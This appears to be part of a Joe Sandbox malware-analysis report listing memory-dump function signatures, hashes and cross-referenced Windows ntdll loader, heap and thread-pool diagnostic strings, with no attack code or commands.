                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: f13a1ea6f74f2909ba85bb450cf2f920be5f5f2d459db6bedb2ad4089a5ead27
                                            • Instruction ID: ea64372a582d2acd800643e8de7399940ab3d2295a4193ca41fdf8a94f2bb41b
                                            • Opcode Fuzzy Hash: f13a1ea6f74f2909ba85bb450cf2f920be5f5f2d459db6bedb2ad4089a5ead27
                                            • Instruction Fuzzy Hash: 5C916A71568345AFD722DB25C841FBBBAECEB94B84F404A2EFA8492151E370D944CB62
                                            Strings
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013021D9, 013022B1
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013022B6
                                            • SXS: %s() passed the empty activation context, xrefs: 013021DE
                                            • .Local, xrefs: 012C28D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 8cfa51c8c65ace5889461db0236bd709d56218aa0c5453506f54cde8618a2b7b
                                            • Instruction ID: ecf5e08e9937356e1b65f78278ac38f4991bb7513137ba3b23d82e8af9f8e7d2
                                            • Opcode Fuzzy Hash: 8cfa51c8c65ace5889461db0236bd709d56218aa0c5453506f54cde8618a2b7b
                                            • Instruction Fuzzy Hash: 6DA1B43191022ADBDB25CF58CC88BE9B7B5BF58714F2542EDDA08A7251DB709E80CF90
                                            Strings
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0130342A
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01303437
                                            • RtlDeactivateActivationContext, xrefs: 01303425, 01303432, 01303451
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01303456
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 3bd6eff04d05e2e3062df7425bc84a5ae4b1424fae929adb7c44b1f9685436b5
                                            • Instruction ID: f43b9f2366ad0bfa730ce33c78bb271c29058ff2646ae8417b6f0e3b7d7179f7
                                            • Opcode Fuzzy Hash: 3bd6eff04d05e2e3062df7425bc84a5ae4b1424fae929adb7c44b1f9685436b5
                                            • Instruction Fuzzy Hash: 656110366206529FD7239F1CC8A1B2BB7E5BF80B14F15862DEA55AF290D730E8018B91
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012F1028
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012F106B
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012F0FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012F10AE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 786dc3ed1d2343adf7cca570e07d3b424c5c3c24db804eae5de5ef4c816e0f62
                                            • Instruction ID: f8e821c2e2a3a66e970db30cdf92b88b91a42eb9150e4f7d0de95c190cfeeacc
                                            • Opcode Fuzzy Hash: 786dc3ed1d2343adf7cca570e07d3b424c5c3c24db804eae5de5ef4c816e0f62
                                            • Instruction Fuzzy Hash: A671F2B19243069FCB20EF18D885FAB7FE8AF55764F404468FA488B286D774D588CBD1
                                            Strings
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0130362F
                                            • LdrpFindDllActivationContext, xrefs: 01303636, 01303662
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01303640, 0130366C
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 0130365C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: 75bb0c429e34f9235cbd0cdcdd2dd13b0d10fcc4eff44f631a5b6e2bef5f7fdd
                                            • Instruction ID: 84e7a80a73a13aaf7b61c7954f10118daf81523d04ceebc01eb3ee7463a98540
                                            • Opcode Fuzzy Hash: 75bb0c429e34f9235cbd0cdcdd2dd13b0d10fcc4eff44f631a5b6e2bef5f7fdd
                                            • Instruction Fuzzy Hash: EE31FA629206939EDF36BB0CC869B2B76A8BB01F54F06436DEB0457155D7A09C80C795
                                            Strings
                                            • apphelp.dll, xrefs: 012B2462
                                            • LdrpDynamicShimModule, xrefs: 012FA998
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012FA9A2
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012FA992
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 5951522f481586a80f5813b1b2948026fc77734d2d33687e25e856d7b5515c07
                                            • Instruction ID: a5ab56f6579128f449fe619d7e204a306d96e895d896edbb762ad5ba920206de
                                            • Opcode Fuzzy Hash: 5951522f481586a80f5813b1b2948026fc77734d2d33687e25e856d7b5515c07
                                            • Instruction Fuzzy Hash: 9F312775630302EBDB319F5DC881AAEBBB8FB84B04F16002DEA046B355D7B0A945C780
                                            Strings
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012A327D
                                            • HEAP: , xrefs: 012A3264
                                            • HEAP[%wZ]: , xrefs: 012A3255
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: 11a05eae6e08dfc4c3337a2887ac43c61923c567b93eea7ddfef0bba695381fb
                                            • Instruction ID: aa9372b35f9502a2cc63ddb163b5cee694e448381f840ab6517e60f65e70f92a
                                            • Opcode Fuzzy Hash: 11a05eae6e08dfc4c3337a2887ac43c61923c567b93eea7ddfef0bba695381fb
                                            • Instruction Fuzzy Hash: 8592CD71A2424ADFDB25CF68C4407AEBBF1FF08300F588499EA49AB392D774A945CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: b3904007fb0292b20d26e48e9fffe40828987c87f36cf7d68f06ffee82316fbb
                                            • Instruction ID: 3982824d4b8ae3111b57ae667feac23a0e7aed99c99f90e8e9a376755340b832
                                            • Opcode Fuzzy Hash: b3904007fb0292b20d26e48e9fffe40828987c87f36cf7d68f06ffee82316fbb
                                            • Instruction Fuzzy Hash: 92F1DF70A20606DFEB25CF68C894F6ABBF5FF44704F148268E6069B391D774E981CB94
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 6fe40212318ad77d59bf38b6ca82ee68bc3b1c9efee707da5942c383122a5f0d
                                            • Instruction ID: 11c70bf0a73b098355ffc55ff85fc4d4fcdf6e3f8cf7a0138be16cf2f629746d
                                            • Opcode Fuzzy Hash: 6fe40212318ad77d59bf38b6ca82ee68bc3b1c9efee707da5942c383122a5f0d
                                            • Instruction Fuzzy Hash: C7C280716283469FD725CF28C881BABBBE5AFC8754F04892DFA89C7281D774D844CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: 99dcaa03d9a2597709a206769e774590713e41784f7692906fcc5efb45e1482a
                                            • Instruction ID: 15305bb66e3b8f67af81d02ca3cc9d5ac093bb7155714a3d061466bf1902663e
                                            • Opcode Fuzzy Hash: 99dcaa03d9a2597709a206769e774590713e41784f7692906fcc5efb45e1482a
                                            • Instruction Fuzzy Hash: 2AA1617192122A9BDB31DF68CC88BEAB7B8FF44710F1001EADA09A7250D7759E84CF50
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012FA121
                                            • LdrpCheckModule, xrefs: 012FA117
                                            • Failed to allocated memory for shimmed module list, xrefs: 012FA10F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 64232000f48cc98088b5a6b083adf88a9e0ff30b4e02d60fd8d53951d52b7534
                                            • Instruction ID: aaeaeb4fe3122928ba2fba789fb0a66d65c2abf18e3b8283011710f66f88d6cb
                                            • Opcode Fuzzy Hash: 64232000f48cc98088b5a6b083adf88a9e0ff30b4e02d60fd8d53951d52b7534
                                            • Instruction Fuzzy Hash: D971AD70A20306DFDB26DF68C981BBEB7F8FB44744F15402DEA06AB251E774A941CB54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: b7f2ffa480c78cb25ebd01304f10b21a8f622f8006285ad30d5abac827ec9f57
                                            • Instruction ID: fdbd76e1c307b7be95fb262d5057778932153573d0d320f31a1d787cde44f708
                                            • Opcode Fuzzy Hash: b7f2ffa480c78cb25ebd01304f10b21a8f622f8006285ad30d5abac827ec9f57
                                            • Instruction Fuzzy Hash: CA61F370620302DFDB29CF28C541B6ABBE1FF44704F54896DEA468F292D7B0E881CB95
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 013082E8
                                            • Failed to reallocate the system dirs string !, xrefs: 013082D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 013082DE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: 63edc2f5ea1cefe76134c40bbcfaf42742d34ec8e10e73e354afb9e1b2ed5cb4
                                            • Instruction ID: 2a5e694b76f260efc6ffd1c111c44de3ce0bb1bdc4c72f0a9370a226540fd339
                                            • Opcode Fuzzy Hash: 63edc2f5ea1cefe76134c40bbcfaf42742d34ec8e10e73e354afb9e1b2ed5cb4
                                            • Instruction Fuzzy Hash: 7141F1B1564301ABC725EB68D845B6F7BECEF94B54F00492EFA48E7290E770D814CB92
                                            Strings
                                            • PreferredUILanguages, xrefs: 0134C212
                                            • @, xrefs: 0134C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0134C1C5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 18177a097ee9a2e1cab5116a41f55bb47a9746f4c3c8eeb68487dfcec3061857
                                            • Instruction ID: 1302d775cc981265c6490a03ed68571263cd5482cdc9dddcae58950e14a4137f
                                            • Opcode Fuzzy Hash: 18177a097ee9a2e1cab5116a41f55bb47a9746f4c3c8eeb68487dfcec3061857
                                            • Instruction Fuzzy Hash: D3416371E1121EEBDF11DED9C881FEEBBF8AB14704F14406AE605B7280E7B4AA448B50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 8353504e7438a8f2effb36a5ef094dba3230ab4260787d970c4677ac6a154f59
                                            • Instruction ID: 7fa9d61c2cbc70b3e5b0ca1ead37e97a2c7aa6437b690c1b806b4a5ae6fb944c
                                            • Opcode Fuzzy Hash: 8353504e7438a8f2effb36a5ef094dba3230ab4260787d970c4677ac6a154f59
                                            • Instruction Fuzzy Hash: 66412631A10768CBEB26EBE9C844BADBBB8FF56348F24045AD901EB781D7749901CB51
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01314899
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01314888
                                            • LdrpCheckRedirection, xrefs: 0131488F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: 8fdbba22e565bc45aee3b7ccaf8059f878097d30d01ca8f7f058f1ecb99b8c95
                                            • Instruction ID: 3b9e1e647dd5c5aca860267a30b6b7c5117a7ec82b5e83f812cc13643d0320a4
                                            • Opcode Fuzzy Hash: 8fdbba22e565bc45aee3b7ccaf8059f878097d30d01ca8f7f058f1ecb99b8c95
                                            • Instruction Fuzzy Hash: 8141E272A143518FCB2ACF2CD840A267FE8AF49B58F09056DED59D7359D331D800CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 2445d7558fb2f03dd4209efa60ebc8c8536c100e634ea6e62c333a9955a832fd
                                            • Instruction ID: b6b0b4d282cfb5b607d580087caabd5fb036048694d70abb3360628b43b0f47a
                                            • Opcode Fuzzy Hash: 2445d7558fb2f03dd4209efa60ebc8c8536c100e634ea6e62c333a9955a832fd
                                            • Instruction Fuzzy Hash: F811CD313352429FDB29DE18D442B7AF3A8EF40B16F58856EF6068B291EB34D840CB58
                                            Strings
                                            • Process initialization failed with status 0x%08lx, xrefs: 013120F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01312104
                                            • LdrpInitializationFailure, xrefs: 013120FA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: cd34d9c46e88f18d7755944e865e9979f0dc894facae3f7dfe7a5fee7a14cb9c
                                            • Instruction ID: 2ad321391d4f70b9ce103be6614e4f22a1c05b97f9641d3f1053435268737e4a
                                            • Opcode Fuzzy Hash: cd34d9c46e88f18d7755944e865e9979f0dc894facae3f7dfe7a5fee7a14cb9c
                                            • Instruction Fuzzy Hash: DFF0C275650308AFE728E75DDC53F9A7B6CFB41B58F200469FA0077689D2B0E941C691
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: 60f49633e295a8b356fcd541a6b1aed596cdbaded1d3d41cc2fb0dda10d3317b
                                            • Instruction ID: 680297d4376bdc6f9ad1cb02375f8f25603f0651a136afb1a9fb9ff5c9e74fc1
                                            • Opcode Fuzzy Hash: 60f49633e295a8b356fcd541a6b1aed596cdbaded1d3d41cc2fb0dda10d3317b
                                            • Instruction Fuzzy Hash: 71714A71A1014ADFDB05DFA8C991BAEB7F8FF08704F144069EA05E7251EA74ED41CBA4
                                            Strings
                                            • LdrResSearchResource Enter, xrefs: 0129AA13
                                            • LdrResSearchResource Exit, xrefs: 0129AA25
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: 8f539ce366b83f3f69d652714e54af4c58b9b1a94b0e236969c9608340f503f3
                                            • Instruction ID: 0155cb963883ba40d99b152d2531f57a898605d9e4a45e305bcfee8f67f31acb
                                            • Opcode Fuzzy Hash: 8f539ce366b83f3f69d652714e54af4c58b9b1a94b0e236969c9608340f503f3
                                            • Instruction Fuzzy Hash: 7AE18071A3031ADBEF22CE9DC990BAEBBB9BF15314F10452AEA01E7241E774D940CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 88c9487a9d99d570f5649cfe7562193699346e4b760246e0a0e46a19757907e4
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 2AC1DD312043469BEB64CF28C840F2BBBE5AFC4B1CF084A2DFA968B290D774D505DB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 79683cdaad485cf29366742a2ca8f364e0ee2d3f0f7a9d52bc50a36e7f794f77
                                            • Instruction ID: 6ff62f04bc86423a45d387963bd95c6dfd3c95620a5c2b6ececdd3f62f596297
                                            • Opcode Fuzzy Hash: 79683cdaad485cf29366742a2ca8f364e0ee2d3f0f7a9d52bc50a36e7f794f77
                                            • Instruction Fuzzy Hash: AA615D72E142199FDB15DFA8C850BAEBBF9FB44B04F14487DE649EB291D731AA00CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 7213945be28082585cdb81aa5cb3133f06e6c423d73c004d4dc8ca541aa7db42
                                            • Instruction ID: 51724cccea348861fe307eaf50353edca2f44750ae9260555b89fbac1555b773
                                            • Opcode Fuzzy Hash: 7213945be28082585cdb81aa5cb3133f06e6c423d73c004d4dc8ca541aa7db42
                                            • Instruction Fuzzy Hash: 15510871E1021DAFEF11DFA9CC90AEEBBBDEB48758F100529E611B7290D6349905CB64
                                            Strings
                                            • kLsE, xrefs: 01290540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0129063D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: 518d4573d8ea1500c2f6b4f2b26b65edfe5a063006eba005db15f8521a92d1d8
                                            • Instruction ID: 8b0ff0094b6bc8cf7c0124c5413272e0b6acdbdaa766461c5540aaba4a0efd13
                                            • Opcode Fuzzy Hash: 518d4573d8ea1500c2f6b4f2b26b65edfe5a063006eba005db15f8521a92d1d8
                                            • Instruction Fuzzy Hash: 5751CF7152474B8FDB24DF6CC5406A7BBE9AF84304F10483EFAAA87241E770E545CB9A
                                            Strings
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0129A2FB
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0129A309
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 7da4561a4d9c992812ea9dbcea593be5be0a3a67c62f3e2a0fa97e00b8956d2c
                                            • Instruction ID: 2e46184a68d5969ca60a3ba5d31b4fb43fdf66a118b74a6e7a8db7660977737e
                                            • Opcode Fuzzy Hash: 7da4561a4d9c992812ea9dbcea593be5be0a3a67c62f3e2a0fa97e00b8956d2c
                                            • Instruction Fuzzy Hash: 3B419D31A2474ADBDB15CF5DC841B6ABBB4FF85704F1440A9EE01DB291E2B5D940CB54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: 7d9b3e324eec1c1e336449f8774f71efae1f36bc8b25b721f2ce0e75bdba3888
                                            • Instruction ID: ee4da68a108051c9f05bda5421e945f64d2f547ab18aa2774eb387e69af528b8
                                            • Opcode Fuzzy Hash: 7d9b3e324eec1c1e336449f8774f71efae1f36bc8b25b721f2ce0e75bdba3888
                                            • Instruction Fuzzy Hash: 9D01F4B2260748AFD311DF14CD46F2677E8EB94B29F008A3DA648C7190E374D904CB46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 066d4d61ef44fd1eeea29dbd90263731fd40e5e888fe01857594bd8c29b801d6
                                            • Instruction ID: 7afbc6a75e6d2f664166bce2a51507f807287413cdf5ce7b750081f58ddec420
                                            • Opcode Fuzzy Hash: 066d4d61ef44fd1eeea29dbd90263731fd40e5e888fe01857594bd8c29b801d6
                                            • Instruction Fuzzy Hash: 8B826A75E202198BEF25CFADC880BEDBBB5FF48310F14816ADA19AB251D7709981DF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08c502273de16a4cdeae75039ad4612b460f4a025e3eeda283eddf888b6c7622
                                            • Instruction ID: f12ed6339bba37b925c92d045c74c4f7c848555f41ef16aa78647d95e2c2460e
                                            • Opcode Fuzzy Hash: 08c502273de16a4cdeae75039ad4612b460f4a025e3eeda283eddf888b6c7622
                                            • Instruction Fuzzy Hash: 5D816C71A10609EFDB22CBA9C880BEEBBFAFF48714F11452DE655A7250D770AC05CB60
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84290006152d492bfa4d7826a10df4617990eb40d0fa5d9c482ead60b390de4c
                                            • Instruction ID: 4df29aff17521b4e4f996c5b181dd9939b4c350185dff9800fef75303ee29bd5
                                            • Opcode Fuzzy Hash: 84290006152d492bfa4d7826a10df4617990eb40d0fa5d9c482ead60b390de4c
                                            • Instruction Fuzzy Hash: AB71C07582422ADBCB29CF58C8917BDFBB4FF58710F14416AEA41AB390D7709810CB90
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
